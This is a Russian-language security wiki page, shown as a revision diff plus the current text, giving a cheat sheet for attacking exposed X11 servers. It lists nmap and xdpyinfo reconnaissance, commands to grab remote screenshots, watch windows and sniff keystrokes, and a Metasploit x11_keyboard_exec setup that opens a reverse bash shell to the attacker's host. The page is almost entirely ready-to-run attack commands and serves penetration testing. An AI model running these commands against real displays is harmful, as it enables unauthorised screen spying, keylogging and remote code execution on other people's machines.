X11 all — различия между версиями
Материал из InformationSecurity WIKI
Drakylar (обсуждение | вклад) м (→Разведка) |
Drakylar (обсуждение | вклад) м (→Атаки) |
||
Строка 36: | Строка 36: | ||
convert screenshot.xwd screenshot.png | convert screenshot.xwd screenshot.png | ||
</syntaxhighlight> | </syntaxhighlight> | ||
+ | |||
+ | ==Слежка за экраном== | ||
+ | |||
+ | ===xwatchwin=== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | ./xwatchwin target:0 -w window_id | ||
+ | </syntaxhighlight> | ||
+ | |||
==Сниффер== | ==Сниффер== | ||
Строка 61: | Строка 70: | ||
run | run | ||
</syntaxhighlight> | </syntaxhighlight> | ||
− | |||
=Ссылки= | =Ссылки= | ||
[https://www.hackingarticles.in/penetration-testing-on-x11-server/ x11 туториал] | [https://www.hackingarticles.in/penetration-testing-on-x11-server/ x11 туториал] |
Версия 13:23, 30 апреля 2020
Содержание
Разведка
Поиск сервиса
nmap
nmap target -p 6000 --script x11-access
Проверка подключения
xdpyinfo
xdpyinfo -display <ip>:<display>
Информация об окнах
xwininfo
xwininfo -root -tree -display target:0
Атаки
Скриншоты
xwd
xwd -root -screen -silent -display target:0 > screenshot.xwd
convert screenshot.xwd screenshot.png
Слежка за экраном
xwatchwin
./xwatchwin target:0 -w window_id
Сниффер
Сниффать нажатия
xspy
xspy target
RCE
x11_keyboard_exec
use unix/x11/x11_keyboard_exec
set rhost target
set payload cmd/unix/reverse_bash
set lhost myip
set lport myport
set time_wait 10
run